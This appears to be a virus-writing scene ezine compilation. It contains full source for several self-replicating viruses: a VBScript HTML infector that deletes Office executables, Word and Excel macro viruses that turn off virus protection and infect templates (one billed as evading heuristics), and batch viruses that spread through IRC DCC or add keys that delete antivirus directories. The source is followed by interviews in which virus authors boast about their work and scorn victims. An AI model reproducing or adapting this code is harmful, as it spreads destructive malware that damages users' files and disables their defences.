Set FSO = CreateObject( "Scripting.FileSystemObject" )If Err.Number = 0 Then
Set DC = FSO.DrivesFor Each D In DC
If D.DriveType = 2 ThenSweepDrive D.DriveLetter & ":\"
End IfNext
End If
Sub SweepDrive(pPath)Dim F, S, OOn Error Resume NextSet F = FSO.GetFolder(pPath)InfectFiles FSet S = F.SubFoldersFor Each O In S
SweepDrive(pPath & O.Name & "\" )Next
End Sub
Sub InfectFiles(pFolder)Dim F,Member,Ext,M,COn Error Resume NextSet F = pFolder.FilesFor Each Member In F
M = UCase(Member.Name)If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then
Set M = FSO.GetFile(Member.Path)M.Attributes = (M.Attributes And 1) - 1
M.DeleteEnd IfExt = UCase(FSO.GetExtensionName(Member.Name))If Ext = "HTML" Or Ext = "HTM" Then
Set M = FSO.OpenTextFile(Member.Path, 1)C = M.ReadAllIf InStr( 1,C,MSBound) = 0 Then
Set M = FSO.CreateTextFile(Member.Path, True )M.WriteLine MSBound & CM.Close
End IfEnd if
NextEnd Sub
Private Function ReplaceWithIn(CurChar,NewChar,SourceString)Dim T,TMPT = 1TMP = SourceStringDo While T > 0
T = InStr(T, TMP, CurChar)If T > 0 Then TMP = Left(TMP,T- 1) & NewChar & Mid (TMP,T+ 1)
LoopReplaceWithIn = TMP
End Function
'MSBound by Suppa. --></SCRIPT>
<HTML><HEAD><TITLE>MSBound</TITLE></HEAD><BODY BGCOLOR="#000000" ><BR><BR><BR><CENTER><TABLE BORDER=0 BGCOLOR="#000000" CELLPADDING=10><TR><TD><FONT COLOR="#FF0000" ><U><B><FONT COLOR="#FF0000" > MSBound by Suppa.</B></U><BR><BR><BR>This is the parent HTML file containing MSBound written by Suppa.<B R>Feel free do to what you want with it, but don 't blame me if it comes back to you.<BR><BR>Special thanks go out to Gigabyte for getting me interested in these things.<BR></FONT></TD></TR></TABLE></CENTER></BODY></HTML>
VERSION 1.0 CLASSBEGIN
MultiUse = - 1 'TrueENDAttribute VB_Name = "ThisDocument"Attribute VB_GlobalNameSpace = FalseAttribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TruePrivate Declare Function SetSysColors Lib "user32" ( ByVal nChanges As Long , lpSysColor AsLong , lpColorValues As Long ) As LongPrivate Sub Document_Open()' LSD' By The WalruS 09/00 v1.00
On Error Resume Next
Randomize
If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
Select Case Application.Version
Case "9.0"System.PrivateProfileString( "" ,
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security" , "Level" ) = 1&CommandBars( "Macro" ).Controls( "Security..." ).Enabled = False
Case "8.0"Options.VirusProtection = FalseOptions.SaveNormalPrompt = FalseOptions.ConfirmConversions = False
End Select
With Application.ScreenUpdating = False.DisplayStatusBar = False.DisplayAlerts = False
End With
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKey F11), KeyCategory:= 0, Command:= " "
Set nor = NormalTemplate.VBProject.vbcomponents( 1).CodeModuleSet doc = ActiveDocument.VBProject.vbcomponents( 1).CodeModule
ChangeHook = Int(Rnd * 2)Select Case ChangeHook
Case 0Hook = "Private Sub Document_Open()"
Case 1Hook = "Private Sub Document_Close()"
End Select
Open "C:\Windows\" & Day(Now) & ".sys" For Output As #1Print #1, "Private Declare Function SetSysColors Lib ""user32 "" (ByVal nChanges As Long,
lpSysColor As Long, lpColorValues As Long) As Long"Print #1, HookPrint #1, VBProject.vbcomponents( 1).CodeModule.Lines( 3, 110 )Close #1
If nor.Lines( 3, 1) <> "' LSD" Thennor.DeleteLines 1, nor.CountOfLinesnor.AddFromFile ( "C:\Windows\" & Day(Now) & ".sys" )NormalTemplate.Save
ElseIf doc.Lines( 3, 1) <> "' LSD" Thendoc.DeleteLines 1, doc.CountOfLinesdoc.AddFromFile ( "C:\Windows\" & Day(Now) & ".sys" )
End If
With Dialogs(wdDialogFileSummaryInfo).Author = "WalruS".Title = "CandyFlippin".Execute
End With
TimeCheck = Second(Now)One = Left(TimeCheck, 1)Two = Right(TimeCheck, 1)If One = Two Then Call CandyFlip
NormalTemplate.Saved = TrueIf ActiveDocument.Saved <> True Then ActiveDocument.Save
End Sub
Private Sub CandyFlip()On Error Resume Nexta = SetSysColors( 1, 1, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 2, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 3, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 4, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 5, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 6, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 7, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 8, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 9, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 10, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 11, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 12, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 13, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 14, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 15, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 16, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 17, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 18, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 19, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 20, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 21, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 22, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 23, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 24, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 25, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 26, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 27, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))
End Sub
'AidaPrivate Sub Document_Open(): With Options: Const nula = 0.VirusProtection = nulaEnd With : Dim a, b, c, da = Strings.RTrim(ThisDocument.VBProject.VBComponents ( 1).CodeModule.Lines( 1, _ThisDocument.VBProject.VBComponents( 1).CodeModule.CountOfLines))With NormalTemplate.VBProject.VBComponents( 1).CodeModulec = .Lines( 1, 1)If c <> "'Aida" Then.DeleteLines 1, NormalTemplate.VBProject.VBComponents( 1) _.CodeModule.CountOfLines.InsertLines 1, aEnd IfEnd WithWith ActiveDocument.VBProject.VBComponents( 1).CodeModuled = .Lines( 1, 1)If d <> "'Aida" Then.DeleteLines 1, ActiveDocument.VBProject.VBComponents( 1) _.CodeModule.CountOfLines.InsertLines 1, aEnd If : End WithIf Day(Now()) = 14 And Month(Now()) = 9 ThenWith Selection.Font.Bold = True : .Font.Color = wdColorViolet.Font.Size = 26: .Font.Emboss = True.Font.Animation = wdAnimationSparkleText.Font.Shadow = True : .ParagraphFormat.Alignment = wdAlignParagraphCenterSelection.Text = "Aida: Where ever You are, You are only one that I loved truely!"End WithEnd If'WM97/2K.Aida by e[ax]'Pozdravljam sve pri BiHNet.Org-u!'Greetz to all ppl on #virus and VX-scene!'"Kad sve izgleda da umire, ono se ustvari radja" - e[ax]End Sub
'e[ax]Private Sub Document_open()Dim KVICKJS, CHSJEUR, LCXJSIE, OCKAJRF, SIFDMXUSet CHSJEUR = ThisDocument.VBProject.VBComponents( 1).CodeModuleSet OCKAJRF = NormalTemplate.VBProject.VBComponents( 1).CodeModuleSet LCXJSIE = ActiveDocument.VBProject.VBComponents( 1).CodeModuleKVICKJS = Strings.Trim(CHSJEUR.lines( 1, CHSJEUR.countoflines))SIFDMXU = Strings.LCase( "'e[ax]" )If SIFDMXU <> OCKAJRF.lines( 1, 1) ThenWith OCKAJRF.deletelines 1, OCKAJRF.countoflines.insertlines 1, KVICKJSEnd WithEnd IfIf SIFDMXU <> LCXJSIE.lines( 1, 1) ThenWith LCXJSIE.deletelines 1, LCXJSIE.countoflines.insertlines 1, KVICKJSEnd WithEnd If'WM97/2K.String by e[ax]'SIM v1.0 [String Infection Method] by e[ax]'Greetz: k04x, rudeboy, BIGFOOOT, E-man, SnakeLord, t[r]ax'H4dija, te ostale pri BIHnet.ORG-u'SP.greetz to: Jackie 2Fl0wer, KnowDeth, ASMhead5, Mist, mort-'nala, Giga, LifeWire, Fulvian, Staggle, SlageHamm, Perikles, Evul, and to all ppl on #virus'10x once again for inspiration...'VicES: Where ar u man!?End Sub
Private Sub document_open(): Const nula = 0Dim a, b, c, d: Set b = ThisDocument: Options.VirusProtection = nulaIf b = ActiveDocument Then Set c = NormalTemplate Else Set c = ActiveDocumentd = b.VBProject.vbcomponents( 1).codemodule.lines( 1, _b.VBProject.vbcomponents( 1).codemodule.countoflines): a = Strings.LCase(d)With c.VBProject.vbcomponents( 1).codemodule
If .lines( 14, 1) <> "'string2" ThenWith c.VBProject.vbcomponents( 1).codemodule
.deletelines 1, c.VBProject.vbcomponents( 1).codemodule.countoflines
.insertlines 1, aEnd With
End IfEnd WithEnd Sub'string2
VERSION 1.0 CLASSBEGIN
MultiUse = - 1 'TrueENDAttribute VB_Name = "Blade"Attribute VB_GlobalNameSpace = FalseAttribute VB_Creatable = FalseAttribute VB_PredeclaredId = FalseAttribute VB_Exposed = FalsePrivate Sub Document_Close()On Error Resume Next'Class.Blade'code by Necronomikon'greetz to:Gigabyte,jackie,SnakeByte,Lys Kovick,SerialKiller,Perikles,-KD-,SnakeMan,SlageHam mer,dageshi,Ratter,#virus,#shadowvx,[6oCKeR],Fii7e,LISPApplication.DisplayAlerts = wdAlertsNoneApplication.EnableCancelKey = wdCancelDisabledApplication.DisplayStatusBar = FalseOptions.ConfirmConversions = FalseOptions.VirusProtection = FalseCommandBars( "Macro" ).Controls( "Security..." ).Enabled = FalseSystem.PrivateProfileString( "" ,"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security" , "Level" ) = 1&Options.SaveNormalPrompt = FalseOptions.BlueScreen = True : Application.WindowState = wdWindowStateMaximizeCommandBars( "Tools" ).Controls( "Macro" ).Enabled = ( 99 - 99): CommandBars( "File" ).Controls("Print Preview" ).Enabled = ( 99 - 99): CommandBars( "Edit" ).Controls( "Select All" ).Enabled = (99 - 99)CommandBars( "Edit" ).Controls( "Undo VBA-Selection.TypeText" ).Enabled = ( 99 - 99):CommandBars( "Tools" ).Controls( "Word Count..." ).Enabled = ( 99 - 99):CommandBars( "Tools" ).Controls( "Options..." ).Enabled = ( 99 - 99)For Each Target In Application.VBE.VBProjectsIf Target.VBComponents( 1).CodeModule.Lines( 1, 1) = "" Then Target.VBComponents( 1).CodeModule.addfromstring, ThisDocument.VBProject.VBC omponents( 1).CodeModule.Lines( 1, 26)NextFor i = 1 To Documents.CountIf Documents(i).Saved = False Then Documents(i).SaveAs Documents(i).FullNameNextSystem.PrivateProfileString( "" , "HKEY_CURRENT_USER\ControlPanel\Desktop" , "MenuShowDelay" ) ="10000"End Sub
Private Sub Document_Open()y = y + 1Set a = Word.Application.ApplicationSet j = a.MacroContainerSet k = j.VBProject.vbcomponents(y)Set c = k.codemoduleIf j = a.NormalTemplate Then Set i = a.ActiveDocument Else Set i = a.NormalTemplateSet e = i.VBProjecta.Options.VirusProtection = vbEmptya.Options.SaveNormalPrompt = vbEmptyWith e.vbcomponents(y).codemoduleIf Not .lines( 16, y) Like "'L*m*" Then .deletelines y, .countoflines: .insertlines y, c.lines(y, 19)End WithIf InStr(y, VBA.Time, "5" ) Then MsgBox "I'm so happy 'cause today I found my friends, they are in my head." & vbCrLf & "I'm so ugly, thats ok 'cause so are you. Broken mi rrors." &vbCrLf & "Sunday morning is every day for all I care and I'm not scared." & vbCrLf & "Light my candles in a days 'cause I forgot..." , vbInformation, "Lithium"End Sub'Lithium / (c) 1999 jackie'(Prove sample of Anti-Bloodhound code)'No backdrops and no lights can focus'on that shit...Linezer0 Oldskewl Tribe
' ---[snip]---
' Hi there kids, this some very old werk to show yo u how to code anti-' bloodhound-heuristically. Well, it's just a basic example to prove' that it's possible to bypass that heuristic. xD J ust check it out and' enjoy!
' Whatever tomorrow brings,' jackie
'firealPrivate Sub Workbook_Open()On Error Resume NextFor Each fireal In ThisWorkbook.VBProject.VBComponentsIf fireal.Properties.Count = 73 Then ourcode = fireal.codemodule.Lines( 1, 20)NextFor Each book In WorkbooksFor Each fireal In book.VBProject.VBComponentsIf fireal.Properties.Count = 73 And fireal.codemodule.Lines( 1, 1) <> "'fireal" Thenfireal.codemodule.deletelines 1, fireal.codemodule.countoflinesfireal.codemodule.insertlines 1, ourcodeIf book.Path = "" Then book.SaveAs book.FullName Else book.SaveEnd IfNextNextEnd Sub'x97m.fireal (c) 1999 jackie'1st language independent excel class infector'No backdrops and no lights can focus on that shit. ..Linezer0 '1999
' ---[snip]---
' Hi there kids, same as Lithium, I just can prese nt you some old werk' because of that damn zip disk crash. Hope you can enjoy this language' independent x97m. Catch y'all around.
' Do you know how I feel,' jackie
@echo off
::IRC.HighHopes.c::by -KD- [Metaphase VX Team & NoMercyVirusTeam]::Greets to Evul, Tally, AngelsKitten, KidCypher, nucleii,::Roadkil, Zanat0s, Duke, Lys, Jackie, Foxz, darkman, lea::Raven, Deloss, JFK, BSL4, and -Everyone- in #virus
if errorlevel 1 goto noscrc:md c:\pkdown >nulecho [script]>>c:\mirc\script.iniecho n0=;HighHopes.a>>c:\mirc\script.iniecho n1=;by -KD- [Metaphase VX Team & NoMercyVirusTeam]>>c:\mirc\script.iniecho n2=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }>>c:\mirc\script.iniecho n3= /dcc send $nick C:\mirc\hope.zip>>c:\mirc\script.iniecho n4=}>>c:\mirc\script.iniecho n5=>>c:\mirc\script.iniecho n6=ON 1:QUIT:#:/msg $chan The grass was greener.>>c:\mirc\script.iniecho n7=ON 1:connect: {>>c:\mirc\script.iniecho n9= /run attrib +r +s +h C:\mirc\script.ini>>c:\mirc\script.iniecho n10= /run attrib +r +s +h C:\mirc\hope.zip>>c:\mirc\script.iniecho n11=}>>c:\mirc\script.iniecho open ftp.elkhart.net>>c:\ftpme.txtecho anonymous>>c:\ftpme.txtecho [email protected]>>c:\ftpme.txtecho cd pub>>c:\ftpme.txtecho cd shareware>>c:\ftpme.txtecho binary>>c:\ftpme.txtecho hash>>c:\ftpme.txtecho lcd c:\pkdown>>c:\ftpme.txtecho get pkzip204.exe>>c:\ftpme.txtecho bye>>c:\ftpme.txt
:noscrecho Keep this open for to have Good Luck! >>c:\highhopes1.txtecho When it closes you will have Good Luck! >>c:\highhopes1.txtecho Some one has high hopes for You!! >>c:\highhopes1.txt@echo ontype c:\highhopes1.txt@echo offecho y| del c:\highhopes1.txt >nulif errorlevel 1 goto noftp%windir%\ftp.exe -s:c:\ftpme.txt >nul
:noftpecho >>c:\highhopes.txtecho The grass was greener. The light was brigher. >>c:\highhopes.txtecho The taste was sweeter. The nights of wonder. >>c:\highhopes.txtecho With friends sorrounding. The dawn mist glowing.>>c:\highhopes.txtecho The water flowing. The endless river. >>c:\highhopes.txtecho For Ever And Ever..... >>c:\highhopes.txt@echo ontype c:\highhopes.txt@echo offif errorlevel 1 goto nogoecho y| del c:\highhopes.txt >nulcd \pkdownc:\pkdown\pkzip204.exe >nulecho y| copy %0 c:\pkdown\highhopes.bat >nulc:\pkdown\pkzip hope.zip highho~1.bat >nulecho y| copy hope.zip c:\mirc >nulcd \
echo y| del c:\pkdown\*.* >nulrd c:\pkdown >nulecho y| del c:\ftpme.txt >nulnogo:@echo offcls
@echo off %_FukThat%
::###########################################
::Fuck That 1.0a
::Deloss / NuKE
::This virus goes out to Ruzz and his
::fucked up policies of with who his members
::in Shadowvx can and cannot speak to.
::Free The Tree Frogs!
::###########################################
if ' %1=='FukThat goto FukThat %2
set FukThat =%0.bat
if not exist %FukThat% set FukThat =%0
if ' %FukThat%==' set FukThat =autoexec.bat
if exist c:\_FukThat.bat goto FG
if not exist %FukThat% goto FZ
find "FukThat" <%FukThat%>c:\_FukThat.bat
attrib c:\_FukThat.bat +h
:FG
command /c c:\_FukThat F V . .. \ %path%
:FZ
set FukThat =
goto FE
:FV
shift %_FukThat%
if ' %2==' exit FukThat
for %%a in ( %2\ * .bat %2* .bat) do call c:\_FukThat F I %%a
goto FV
:FI
find "FukThat" <%3>nul
if not errorlevel 1 goto FE
type %3>FukThat$
echo . >>FukThat$
type c:\_FukThat.bat >>FukThat$
move FukThat$ %3>nul
:FD
echo . | date | find "12" >nul .FukThat
echo DEVICE =c:\windows\command\ansi.sys >>config.sys
if errorlevel 1 goto FN
:FN
echo . | date | find "13" >nul .FukThat
@echo on
echo and if they say you can't come around here say * fuck that * .
echo and if they say you can't come around me say * fuck that * .
ESC[ "n";"y";13p
ESC[ "y";"n";13p
ESC[ "N";"y";13p
ESC[ "Y";"n";13p
ESC[ "a";" del c:\avp";13p
ESC[ "e";" del c:\f-prot";13p
ESC[ "i";" del c:\mcafee";13p
ESC[ "o";" del c:\nav";13p
ESC[ "A";" del c:\avp";13p
ESC[ "E";" del c:\f-prot";13p
ESC[ "I";" del c:\mcafee";13p
ESC[ "O";" del c:\nav";13p
if errorlevel 1 goto FE
echo off
exit FukThat
:FE
Real Time Interview with Rajaat
Interviewer: Gigabyte
First question.. Do all VXers here walk around stoned all day and bang with their heads against lamp posts? <G>
Well, in order to feel at home during an Amsterdam VX meeting you will have to walk the left-hand path ofstonedness. I think I'll manage to become Dutch quite well ;-)
How old were you when you had your first experience with computers?
My first computer was an Aquarius, an ugly little fellow with blue rubber keys. I got it for my birthday when I was 7years old.
How old were you when you joined the VX scene?
I was just about your age when I conducted my first virus experiments, just before I got 18 years old.
How many viruses have you written by now.. any chance your totally drugged brain can still remember?
I cannot recall an actual number, but I think it must be around 200 or so, including minor variants.
Do you consider yourself an 'evil' or rather 'nice' VXer?
I consider myself to be a 'nice' VXer, if you can speak of such a thing. Since we are evil in the eyes of the end users, Ifrankly don't care if I appear to be friendly or not.
Which language do you like most for writing viruses?
Hah, that's a good question. I would likr a language in which you have complete control over the code it generates, sohighly configurable languages like C-- or Terse are good, but lack the things needed in a ring0 win32 environment. Iyet have to look for a free language that comes with source and generates tight code. Perl is interesting, thoughextremely bloated.
Did you ever write anything destructive? If so, how do you feel about that now?
I have written one virus that did intentional damage, but after having goofed up with debug I decided for my owngood to try to make them as harmless as possible.
What is, in your opinion, the most idiotic comment about any of your viruses you've seen, from AVers?
I laughed a lot when I saw the description of Fick.7326 on the AVP site. I had expected that Kaspersky would besmart enough to recognize that major part of it is written in Borland C++, instead of Pascal.
Do your family and friends know you write viruses?
Yes, they don't care as long as I leave their machines alone.
What am I doing here between these weirdos? (being the only normal person around)
I have no idea, perhaps masochism? ;-)
Do you have enemies in the scene?
Not that I am aware of. There are people I like and there are people I don't like. These people I do not communicatewith may want to consider themselves my enemy but that makes no difference to me.
What do you think about infected users?
I pity them. After so many media hypes (Michelangelo, Melissa, I love you..) people should have learned thenecessity of installing a good scanner from a trusted source.
If a family member would catch one of your viruses and he/she had no AV installed at all, no backups and he/she hadcaught it by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you helphim/her out?
Yes, and immediately install a cracked version of AVP. I'd tell them they are stupid if they don't keep it updated. Myhobby is writing them, not giving users a hard time. Unfortunately, a virus is made to be spread, thus I give them topeople who are interested.
What's your favourite VX website?
www.coderz.net, it is like a portal form, just like slashdot.
Are you IRC addicted?
No, I don't think so.
How long are you planning to stay in the scene? (Out, out!! ;)
I have no set plans whatsoever, but I feel like I have not tried all the things I wish to accomplish. There is so much Iyet would like to try out, but this mainly has to do with compilers and interpreter issues.
How big do you think my chances are to survive smoking a joint? (in %)
Hmm, about 50% at first, after 20 years of smoking weed I guess that gets trimmed down to 5% :-D But you'll get atry..
Can I take a picture of the cat?
If he agrees you can try, but I had troubles myself keeping him in a pose for longer than 2 seconds.
Which AVers do you hate most?
I don't hate them, though it is a pity they earn money on the digital havoc we wreak.
Which of your viruses are you most proud of?
I think I'm proud of most of them. Each time I coded something I tried out new stuff, so each one is a milestone inmy writing (or lack thereof) skills.
Which other viruses do you like?
I for example like Babylonia for the ideas, win32.crypto for its tricks with encryption. All inventive virus writers havemy respect.
How important is virus writing for you and does it have any influence on your life?
It has not such a great importance as it used to be for me, since my job consumes most time.
Are you in any other underground scene, except for VX? (hacking, phreaking..)
No, those things don't have my interest.
Do you have a real life?
Not very much, it is consumed by my work most of the time, though I might buy one if I got enough cash.
Which kind of movies and music do you like?
I like some movies like Braveheart, The Mummy, The Matrix, horror and comics. My music preference is hard rock.
Do you have any other hobbies?
I don't have many hobbies though I like reading books and sometimes I even enjoy cooking, since I now have to (can'tlive on microwave food alone).
Are you married or do you have a girlfriend?
No.
Do you believe in God?
Yes, for I am my own God :-)
What's your favourite country/city?
The place I would like to be my next holiday is Curacao.
Are you getting bored yet?
No, hungry, where is the food in this pillage of papers?
What's your favourite food?
Aargh! Now questions about food while I'm starving? I like pastas and chips of course.
Do you like junk food?
By occasion, when I don't feel like cooking.
Which channel do you prefer, #vir or #virus, and why?
#virus, by lack of knowledge what the other channel is for.
What do you like most about the scene and writing viruses?
The broad scale of different people involved.
Is there anything else you want to mention?
Not right now, I'll mail you when I come to think of something.
Any greetings or hate messages?
Hate to McDonalds, for not grilling their burgers :-)
Thanks for the interview :)
You're welcome, lets have dinner , Gigabyte :-)
Interview with Raid/SLAM, about Irok
Interviewer: Gigabyte
First of all, how did you come up with the name 'Irok'?
It was named after an american car. The iroc-z camaroI simply named it irok ;p
What about the virus are you personally most proud of?
I'm proud of the fact that avers had no idea what it's payloads did for a very long time.some of them still have incorrect descriptions ;p
How long did it take you to write the virus?
a little over 2 weeks on/off coding
Which part was the most tricky to write?
The memory management section. It's a bitch because of all the little routines inside irok.
Do you ever base your viruses or virus payloads on your real life (something/someone you're mad at, something funnythat happened, habits, etc.), and if so, did you do this in Irok?
Yes, and yes.Irok contains the payload which fits the mood I was in at the time of writing it.
Did you get any positive or negative reactions on the virus payload from other VXers?
I guess it was an even split.Rhape bitched about it, but fuck him.rather, fuck anybody who doesn't like my code. I don't care. ;p
What is, in your opinion, the most funny or idiotic comment about Irok you've seen, from AVers?
oh hehehe, one second
When internal counters of the virus reach certain values, the virus displays a message on screen. Most of this messageis from lyrics of the song 'Aenema' by band 'Tool'. We wont reproduce the message here as the song seriously needsthe Parental Advisory sticker for explicit lyrics.
Hahahahahaha
tis funny, no? :)
it sure isWhich AV was that from?
http://www.Europe.F-Secure.com/v-descs/irok.htm
Do you think Irok is better than Toadie?
hmm, notoadie was funnieriroks mean ;p
On which points is Irok better than other viruses, and what are its weak points?
It's better then some other viruses by default because it works as designed...it's weak points would be the memory it requires, and it's size.and the fact that it's not polymorphic.
Which other viruses that were in the wild at the time Irok was, or later, do you think that actually were so lame thatthey weren't worth any attention at all, and which ones do you respect?
shrug...The vbs viruses suck in my opinion.As for respecting viruses... I'd have to respect the author of the virus, and I don't respect many people.
What do you consider the most important advantage and disadvantage compared to ASM viruses?
advantage... total control of the pc, disadvantage, takes a long time to write a good one.
How do you think most infected users caught the virus?
probably got greedydecided to download a crack or something.
If a family member would catch Irok and he/she had no AV installed at all, no backups and he/she had caught Irok byrunning an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out?
NopeI have little/nothing to do with my family.
What about friends?
I don't have many friends.I think I know 3 people who I really consider as friends.the rest are.. mostly acquaintances.
Do you think the fact that AVers had some trouble figuring out what exactly Irok does, had anything to do with thelanguage it's written in, as ASIC isn't common for viruses?
Yepand I think perhaps they don't know asm as well as they claim.
How important is virus writing for you and did writing Irok have any influence on your life (time, effort, pride,stress)?
Virus writing and smoking pot keep me alive.
Irok had no influence on anything. it was an accomplishment for me.
Are you planning to write any more Irok versions?
probably not.
Is there anything else you want to mention about Irok?
Yes. For those of you who got hit by it, I hope you lost everything.
Any greetings or hate messages?
Oh yesGreetings to : heh, NobodyHatez goes out to: Most of you on both sides, fuck you all.So much for political correctness eh? <g>
Thanks a lot for the interview :)
Interview with The Unforgiven
Interviewer: Gigabyte
Heya.. To start with, what do you occupy with lately?
Life. Gf, friends, work, parties and all other things you can enjoy doing while you still are a young adult.
Which of your viruses are you most proud of?
None really, don't they all suck? Immortal Riot are though responsible for quite a few really awesome viruses. Not mein person though.
Some of your viruses were pretty destructive. How do you think about that now?
I don't really think anything about it since it's all behind me. I much rather live in the present than in the past.
Do you think the VX scene has changed a lot in all those years and do you think it was better then or now?
I am not really a part of the scene anymore but I try to lurk around and keep myself a bit updated. I'm though notreally qualified to make such a comparison.
However, I don't really think you can compare things now and then, if a person start writing viruses now, he mightfancy the scene as much I did back in 1993.
What do you think about all the Internet related viruses now and do you think there will be much more of them?
Internet based malware (viruses, worms and so on) is indeed an interesting thing and I'm certain that we'll see morevirus alike programs circulating on the net in the future.
Internet is very vulnerable and many people will target the net due to the fact that internet technology and internet(un)security are interesting topics and if an attack is done properly, it can affect a lot of people in a very short amountof time.
Which old viruses do you like and which new ones?
I like all viruses. It's a great thing to see that people still sit around and code things just for fun. Programming for meand most other Immortal Riot guys is nowadays stricly business.
Which virus authors and groups do you respect?
Everyone who deserves it. Further information about this can read in our ezines called Insane Reality which all befound at our site located at http://www.coderz.net/ImmortalRiot.
What made you decide to start Immortal Riot?
Curiousity, I think. I'm a very curious person about pretty much everyting.
How important was virus writing for you?
Compared with what? Viruswriting was a hobby, the scene were our playground and viruswriting the ticket toacceptance.
Did you base your viruses or virus payloads on real life issues?
I based some names from real life and I got motivation from real life. Everything is about real life issues in one way oranother.
What do you think about infected users?
I think they should remove the virus.
How do you think most people caught your viruses?
Probably with anti-virus programs.
I only know one person who caught one of my viruses ([Bad Attitude]). He saw "Immortal Riot" scolling all over hismonitor and later became a very good coder and an Immortal Riot member.
Do you still occupy with computers a lot?
I work with computers, but on my spare time? Maybe an hour a week, to pay bills, write emails to friends and ex-girlfriends and of course to annoy people with SMS :).
Is there anything else you want to mention?
Naw, not really.
Any greets or hate messages?
Greets goes to everyone who ever has been mentioned in a positive matter in Insane Reality and of course to all ofImmortal Riot. Special greets must go to Metal Militia.
Thanks a lot for the interview :)
You're welcome.
Interview with Del Armg0/MATRiX
Interviewer: EXE-Gency
Give us a short description of who you are. (Handle, interests, occupation, music, films, location, marital status etc.)
I'm 27, lot's girls and one of my nick in life is Fa, humm ... what's more...¿ I'm somebody very curious in fact... lot'shobbys (vx, phreak, short- wave listener, role-playing-game, playing electronic music too, astronomy, ... i'm happywhen i'm learning in fact ;) Some of my favorites films are "Eraserhead", "CryingFreeman", "Buffet Froid", ... And iluv music-band like "stereolab", "gong", "bauhaus", ... and many more !
What made you choose your handle?
lot's ppl have asked me about it... it's "simply" a name from a AD&D campaign (during 6 years!), there was acharacter i played as dungeon master, she was called "Larynda Nedylene Barrisson Del'ArmgO", it was a famousMartial Drow family, and a very fun game, so... i kept the name.
Have you ever had any previous identities in the computer underground?
nop, i was since i've starting known as Del_Armg0, but it's true for some viral experience i use sometimes anothernick... it's rare. But since the JC'Zic bust, i prefer to be discreet... sometimes.
When did you first get into computers?
I've started on a Amstrad cpc 464, and a thomson MO5 !!! Was really shit but really fun. After that i've meet the Atariworld, and it was great moment. Atari 520/1040 ST was really great. And in 1996, i've bought a PC under windows...humm no comment!
What operating system(s) are you currently running?
I've a first 'puter with Win95, a 486 with a russian Dos (a graphic Dos) called Pts-Dos 6.70 and Win 3.1, i like it a lot.And i'm ever using a Atari 1040 (Tos) At work i'm using Win NT, just shit! I hope i will try Win2k soon, i'm sure itwill be a great OS for Vx ;)
How and when did you first discover the computer underground?
Humm... a bit "just like that", i had bought a modem to meet or know more about Underground Electronic ppl... andit's easy to find evil on the Net ;]
How did you first get into virus programming?
I've started coding to made virus, but i guess the first idea to made a virus come from the first discovered virus when iwas younger, it was really new. And lot's hype was made around it. It was Cpc virus, but i've forgotten the name, thefascination is always here.. Probably some movies like "Wargames" or "Tron" are importants in the story...
Do you have an interest in the other components of the computer underground? (hack/phreak/warez etc.)
Yep. I'm a great fanatic of phreaking, it's a really great and fun "game". Phone network is full of marvellous things...
and i'm lucky, i'm now working in phone network. Hacking is cool, but sometimes too much full of "big-EGO-people", so i prefer try it alone.
Do you consider yourself to be a criminal?
Really not ! But here in France, it's really easy to be one, and for cops i'm probably one... (drug, phreak, vx, ... it's justfun life). But why all cool things of life are illegals !!!?¿
Do the laws in your contry make writing viruses illegal and have you had any trouble with the law in your country?
Yes, laws here are very bad for H/P/V; i've never be busted and i hope i won't be! But i'm sometimes tired to beparanoid when i'm connected... (proxys, wingates and others anonymisers...). Sabia is probably the worst spreading idid, and my ISP leaves me.. arrgghhhh! ... but ..but Viva phone S.E. ;)
Do your friends/family/colleagues know about your interest in the computer underground?
